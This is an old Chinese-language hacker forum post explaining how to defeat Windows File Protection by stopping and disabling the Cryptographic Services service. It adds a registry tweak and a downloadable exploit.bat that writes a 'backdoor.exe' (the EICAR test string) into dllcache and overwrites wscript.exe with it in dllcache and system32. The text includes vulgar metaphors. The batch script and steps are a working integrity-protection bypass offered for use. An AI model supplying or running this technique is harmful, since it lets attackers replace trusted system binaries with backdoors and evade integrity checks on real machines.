cut wfp 's jj easily 【ALLyeSNO】

Author : allyesno

Team   : freexploit

Date     : 2006-01-20

昨晚花了好多时间写的绕过WFP保护的文章 竟然是错的 我感觉很不爽 我决定再次挑战一下wfp

擒贼先擒王 打蛇要打七寸 所以只要我们抓住了 wfp的 小jj 它就不能勃起了

wfp的小jj是谁呢 根据wfp的工作方式

引用:

在 WFP 收到受保护目录中的文件的目录更改通知后，就会触发这种保护机制。WFP 收到这一通知后，就会确定更改了哪个文件。如果此文件是受保护的文件，WFP 将在编录文件中查找文件签名，以确定新文件的版本是否正确。如果此文件的版本不正确，WFP 将使用高速缓存文件夹（如果文件位于高速缓存文件夹中）或安装源中的文件替换新文件。

wfp的小jj就是 编录文件 阉割了它 基本上 wfp就是废人了

怎么阉割它呢 通过查阅葵花宝典（MSDN） 欲练神功 必先自宫 我们知道 windows里面有个服务叫做 Cryptographic Services

这个服务的作用是

引用:

提供三种管理服务: 编录数据库服务，它确定 windows 文件的签名；受保护的根服务，它从此计算机添加和删除受信根证书颁发机构的证书；和密钥(Key)服务，它帮助注册此计算机获取证书。如果此服务被终止，这些管理服务将无法正常运行。如果此服务被禁用，任何依赖它的服务将无法启动。

干掉这个服务 就可以了 停止用 net stop 由于这个服务再电脑重启后会自动开启 所以我们用SC禁用它

重要的补充：

XP sp2 以及 2k 由luoluo的测试

[16:57] <luoluo> cs 就是 cryptsvc.dll
[16:58] <luoluo> win xp中是svchost方式运行
[16:58] <luoluo> win 2000里 services进程里可以找到这个模块

非常重要的补充：

在大家的反复测试下 发现 CS服务以及WFP的几个特性 CS服务在第一次关闭以后 会自动启用

（往后 重复启动 停止 CS都不会自动启用了）

so 我想这就是 envymask为什么测试会弹出框的原因

有两个解决的办法：

1.利用luoluo提出的替换服务 把 cs服务用其他服务替换 那么即使cs再次启动 也不能启检查作用

2.修改注册表 HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Hardware Profiles/0001/System/CurrentControlSet/Enum/ROOT/LEGACY_CRYPTSVC/0000

0值 为启用
1值 为禁用

为了彻底干掉cs服务 我们设值为1

wfp的特性 仅在系统文件被删除 或者 替换的时候 调用cs服务对其进行检测

而当我们结束cs服务 删除 或者 替换系统文件以后 再次启动cs服务 wfp不会对系统文件是否改动

做检测 所以wfp的监控 是动态的



写个bat实现 test pass in win 2003

exploit.bat

引用:

@echo off
rem cheat WFP check by allyesno
rem my site : http://blog.donews.com/allyesno/
rem my email : shellget@hotmail.com
echo plz waiting net stop to stop
net stop "Cryptographic Services"
echo.
echo plz waiting sc config this service
sc config "cryptsvc" start= disabled
echo X5O!P%%@AP[4/PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>%systemroot%/system32/dllcache/backdoor.exe
echo copy /y %systemroot%/system32/dllcache/wscript.exe %systemroot%/system32/dllcache/wscript.exe.bak
copy /y %systemroot%/system32/dllcache/wscript.exe %systemroot%/system32/dllcache/wscript.exe.bak
echo copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/dllcache/wscript.exe
copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/dllcache/wscript.exe
echo copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/wscript.exe
copy /y %systemroot%/system32/dllcache/backdoor.exe %systemroot%/system32/wscript.exe
echo yeah we finished our work
echo check the %systemroot%/system32/wscript.exe by dir
echo n u c the file size,Good luck test by allyesno in Win2003 n WinXP OS
echo echo thx:ZeTa,envymask,10,luoluo 4 test

my site : http://blog.donews.com/allyesno/

my email : shellget@hotmail.com (只接收纯文本方式的邮件)

特别感谢：ZeTa,envymask 在Win2003,10在2k中的测试结果

luoluo提出的 替换服务的补充 以及 在XP sp2中的测试

参考文献:

http://www.microsoft.com/china/winlogo/policies/signature-benefits.asp

http://support.microsoft.com/default.aspx?scid=kb;zh-cn;222193

http://support.microsoft.com/default.aspx?scid=kb;zh-tw;282784

http://support.microsoft.com/default.aspx?scid=kb;zh-cn;222193

附件: exploit.rar [需 0 社区元下载]
该文件已经被下载 11 次.

. . . . . . . . . . . . . . . . . .
引用:
幻影群
幻影之水 14335770
PST Project 16385798
IRC 聊天室
irc.0x557.org +9940 (ssl) #ph4nt0m #segfault
xfocus.org +61111 (ssl) #sigxfocus

 

由 allyesno 于 2006-01-17 07:08 PM 最后编辑